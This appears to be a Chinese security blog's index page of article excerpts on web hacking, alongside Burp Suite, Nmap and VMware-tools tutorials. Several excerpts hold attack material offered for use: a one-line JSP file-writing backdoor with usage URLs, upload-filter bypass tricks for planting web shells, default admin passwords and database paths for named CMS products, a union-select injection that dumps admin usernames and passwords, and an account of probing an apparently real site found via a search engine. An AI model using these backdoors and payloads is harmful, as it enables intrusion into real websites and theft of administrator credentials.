摘要： <%@ page contentType="text/html; charset=gb2312" language="java" import="java.io.*" errorPage="" %><html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>Untitled Document</ti 阅读全文

摘要： ＜% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %＞ 这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url! http://localhost/1.jsp?f=1.txt&t=hello 然后:ht 阅读全文

摘要： BackTrack5 R2 KDE下Vmware tools的安装 分类： [linux编程] [渗透测试] [backtrack] 2012-08-09 14:59 1人阅读 评论(0) 收藏 举报 1.用mkdir /etc/cups/ppd创建ppd目录，免得最后出现下面错误，导致vmwraetools安装失败Unable to create symlink "/etc/cups/ppd/VMware_Virtual_Printer.ppd" pointing to file"/usr/lib/vmware-tools/configurator/thinpr 阅读全文

摘要： 为什么在Ajax hacking中使用XSS？它与传统的XSS又有什么区别？它们各有怎么样的利弊端？大型网站的所谓XSS漏洞是否为鸡肋？下面我们一起来详细分析下。 Ajax hacking Ajax hacking这个名词最先出现在Billy Hoffman的一篇名为《AJAX dangers》报告中，他把samy 和yamanner这种攻击形式定义为AJAX hacking。而在此之前它们只是被说属于web2.0蠕虫（或XSSworm） ，但对这种攻击形式并没有一个明确的定义。这里我们暂以AJax hacking中的XSS进行一些深入的性讨论 。关于Ajax的其他攻击形式请到网上参看文章.. 阅读全文

摘要： Nuclear’Atk 整理的：上传漏洞拿shell：1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马，拿到shell.2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。4.gif文件头欺骗5.同名重复上传也很OK。：入侵渗透中用到的命令，语法：set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息tasklist /svc 查看 服务对应的pidnetstat -ano，netstat 阅读全文

摘要： Burp Suite是Web应用程序测试的最佳工具之一，其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。本文将做一个Burp Suite完全正的演练，主要讨论它的以下特点.1.代理--Burp Suite带有一个代理,通过默认端口8080上运行，使用这个代理，我们可以截获并修改从客户端到web应用程序的数据包.2.Spider(蜘蛛)--Burp Suite的蜘蛛功能是用来抓取Web应用程序的链接和内容等，它会自动提交登陆表单（通过用户自定义输入）的情况下.Burp Suite的蜘蛛可以爬行扫描出网站上所有的链接, 阅读全文

摘要： 作者：晓华 开篇介绍 在FLYH4T大哥的“Mysql5注射技巧总结”一文中介绍了通过使用“information_schema”库实现遍历猜解库名表名以及字段名的技术，解决了一些以前使用工具无法猜解到的库名表名以及字段名的问题，提高了注射的效率。关于此文的详细技术细节请参考往期的“黑客手册”。但是通过我的研究，发现这种技巧有一定的缺陷。首先遍历的库名或者表名以及字段名等位置，要使用到limit功能语句来强制返回select查询的记录数。如果在渗透中limit功能语句无法使用，是不是很难进行遍历了？如果被限制的话，可以使用“!=”来绕过。语句使用格式：show.php?id=2/**/and/ 阅读全文

摘要： RT，小菜前天碰到一个百度收录较为前面的asp站,突然萌发了想练练手的想法，于是乎有了下面的文章。稍微手工了下，url栏输入’以及3=3和3=4返回正常。但是浏览器显示脚本错误。蛋疼，大概没有注入吧。啊D和haviji齐上。悲剧的是没反应，数据库无法猜解。而且注入点也没出来。小菜没法，掏出神器御剑以及大字典狂扫不已。扫下。。木有编辑器，估计都被删了或者改名了。。不一会儿。后台出来了。猜解弱口令。。这管理员还是蛮变态的，连个漏子都没得。用户名和密码都没得捡。怎么办呢。回到前台。突然发现搜索栏还没有检测，啊。。。没准儿有门儿。在搜索栏加了个 ’报错。。唉。貌似有门儿。继续法克之~搜索框里：输入1% 阅读全文

摘要： 本文由阿德马翻译自国外网站Nmap是一款网络扫描和主机检测的非常有用的工具。Nmap是不局限于仅仅收集信息和枚举，同时可以用来作为一个漏洞探测器或安全扫描器。它可以适用于winodws,linux,mac等操作系统。Nmap是一款非常强大的实用工具,可用于：检测活在网络上的主机（主机发现）检测主机上开放的端口（端口发现或枚举）检测到相应的端口（服务发现）的软件和版本检测操作系统，硬件地址，以及软件版本检测脆弱性的漏洞（Nmap的脚本）Nmap是一个非常普遍的工具，它有命令行界面和图形用户界面。本人包括以下方面的内容:介绍Nmap扫描中的重要参数操作系统检测Nmap使用教程Nmap使用不同的技术 阅读全文

摘要： 默认：admin adminadmin admin888'or'='or'默认数据库Databases/079lidc.mdb改样式上传:http://www.yangtong.com/admin/southidceditor/admin_style.asp抓包 明小子上传注:通杀南方数据 良精系统 网软天下等http://www.xxx.cn/NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union selec 阅读全文